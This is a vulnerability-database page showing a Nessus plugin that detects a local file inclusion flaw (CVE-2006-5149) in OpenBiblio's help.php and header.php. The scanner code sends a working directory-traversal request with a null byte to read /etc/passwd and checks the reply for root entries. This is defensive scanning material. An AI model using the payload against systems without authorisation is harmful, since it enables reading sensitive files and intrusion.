Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2006-2022 and is owned by Tenable, Inc. or an Affiliate thereof.OPENBIBLIO_052.NASL
HistoryOct 03, 2006 - 12:00 a.m.

OpenBiblio < 0.5.2 Multiple Scripts Local File Inclusion

2006-10-0300:00:00
This script is Copyright (C) 2006-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
12
JSON

The remote host is running OpenBiblio, a free, automated library system written in PHP.

The version of OpenBiblio installed on the remote host fails to sanitize user-supplied input to the ‘tab’ and ‘page’ parameters of the ‘shared/header.php’ and ‘shared/help.php’ scripts, respectively before using it to include PHP code. An unauthenticated, remote attacker may be able to exploit these issues to view arbitrary files or to execute arbitrary PHP code on the remote host, subject to the privileges of the web server user id.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(22496);
  script_version("1.22");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2006-5149");
  script_bugtraq_id(20301);

  script_name(english:"OpenBiblio < 0.5.2 Multiple Scripts Local File Inclusion");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
multiple local file include issues.");
  script_set_attribute(attribute:"description", value:
"The remote host is running OpenBiblio, a free, automated library
system written in PHP. 

The version of OpenBiblio installed on the remote host fails to
sanitize user-supplied input to the 'tab' and 'page' parameters of the
'shared/header.php' and 'shared/help.php' scripts, respectively before
using it to include PHP code.  An unauthenticated, remote attacker may
be able to exploit these issues to view arbitrary files or to execute
arbitrary PHP code on the remote host, subject to the privileges of
the web server user id.");
  script_set_attribute(attribute:"see_also", value:"http://sourceforge.net/project/shownotes.php?release_id=451780");
  script_set_attribute(attribute:"solution", value:
"Upgrade to OpenBiblio 0.5.2 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_cwe_id(22);

  script_set_attribute(attribute:"vuln_publication_date", value:"2006/09/30");
  script_set_attribute(attribute:"plugin_publication_date", value:"2006/10/03");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:openbiblio:openbiblio");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("http_version.nasl");
  script_require_keys("www/PHP");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");

port = get_http_port(default:80, embedded: 0);
if (!can_host_php(port:port)) exit(0);

# Loop through directories.
if (thorough_tests) dirs = list_uniq(make_list("/openbiblio", "/library", cgi_dirs()));
else dirs = make_list(cgi_dirs());

foreach dir (dirs) {
  # Grab index.php.
  file = "../../../../../../../../../../etc/passwd%00";
  w = http_send_recv3(method:"GET",
    item:string(
      dir, "/shared/help.php?",
      "page=", file
    ),
    port:port
  );
  if (isnull(w)) exit(1, "The web server on port "+port+" did not answer");
  res = w[2];

  # There's a problem if there's an entry for root.
  if (
    "OpenBiblio Library Automation System" >< res &&
    (
      # there's an entry for root or...
      egrep(pattern:"root:.*:0:[01]:", string:res) ||
      # we get an error saying "failed to open stream" or...
      string("/help/", file, "\\0.php): failed to open stream") >< res ||
      # we get an error claiming the file doesn't exist or...
      string("/help/", file, "): failed to open stream: No such file") >< res ||
      # we get an error about open_basedir restriction.
      string("open_basedir restriction in effect. File(", file) >< res
    )
  )
  {
    contents = NULL;
    if (egrep(string:res, pattern:"root:.*:0:[01]:"))
    {
      contents = strstr(res, 'font class="primary">');
      if (contents && '<!-- ' >< contents) 
        contents = contents - strstr(contents, '<!-- ');
      if (contents && "<br>" >< contents) 
        contents = strstr(contents, "<br>") - "<br>";
    }

    if (contents && report_verbosity)
    {
      contents = data_protection::redact_etc_passwd(output:contents);
      report = string(
        "\n",
        "Here are the contents of the file '/etc/passwd' that Nessus\n",
        "was able to read from the remote host :\n",
        "\n",
        contents
      );
      security_hole(port:port, extra:report);
    }
    else security_hole(port);

    exit(0);
  }
}
VendorProductVersionCPE
openbiblioopenbibliocpe:/a:openbiblio:openbiblio

Related

cve 1
cve
cve
CVE-2006-5149
2006-10-05 04:04:00
JSON
Related for OPENBIBLIO_052.NASL
cve1